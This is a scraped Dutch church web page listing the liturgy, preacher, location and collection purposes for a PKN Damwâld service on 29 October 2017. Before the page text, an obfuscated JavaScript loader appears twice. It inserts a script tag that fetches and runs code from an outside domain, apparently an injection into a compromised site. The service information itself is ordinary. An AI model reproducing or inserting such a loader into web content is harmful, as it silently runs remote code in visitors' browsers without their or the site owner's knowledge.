;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 29 oktober 2017 9:30 uur - PKN Damwâld
zondag 29 oktober 2017
09:30 uur

Kerkdienst zondag 29 oktober 2017 9:30 uur

Informatie

Voorganger:Ds. J.F. Mol, Nijega
Organist:Nienke van der Heide-Visser
Liturgie
Lied voor de dienst Elb 362
Welkom en mededelingen
aanvangslied : Psalm 46
Stilgebed, Votum en Groet
We zingen: Gezang 401
Gebod Romeinen 12:9-21
We zingen: Gezang 48: 2, 4 en 6
Gebed om de opening van het Woord
1e Schriftlezing: Psalm 46
We zingen: Gezang 239: 1, 3, 4 en 6
- 2e Schriftlezing Romeinen 1:14-17
We zingen: Gz 402: 1, 3 en 4
Preek
Geloofsbelijdenis Gz 239: 7
Dienst van de gebeden
Collecte
Slotlied : Gezang 48: 1, 9 en 10
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Hervormingsdag - Steun theologisch onderwijs Pakistan

Hervormingsdag - Steun theologisch onderwijs in Pakistan
Dit jaar vieren we 500 jaar protestantisme, vijf eeuwen hervorming. Centraal in de collecte staat daarom het vernieuwende werk van het Open Theologisch Seminarie in Pakistan, OTS. In Pakistan vormen Christenen een kleine, maar groeiende minderheid. Via cursussen leren jaarlijks vijfduizend studenten en voorgangers meer over het Christelijk geloof en de Bijbel. Kerk in Actie-partner OTS ontwikkelt ook lesmaterialen voor zondagsscholen, godsdienstonderwijs op scholen, cursussen discipelschap en zelfs een doctoraalstudie theologie. Veel cursussen en materialen zijn beschikbaar via internet. Dat helpt ook geïnteresseerde moslims en hindoes die meer willen weten over het Christendom. Met deze collecte steunt u het zendingswerk van Kerk in Actie, zodat OTS meer voorgangers en vrijwilligers kan opleiden en toerusten. Van harte aanbevolen!

Tweede collecte: Kerk
Uitganscollecte: Kerk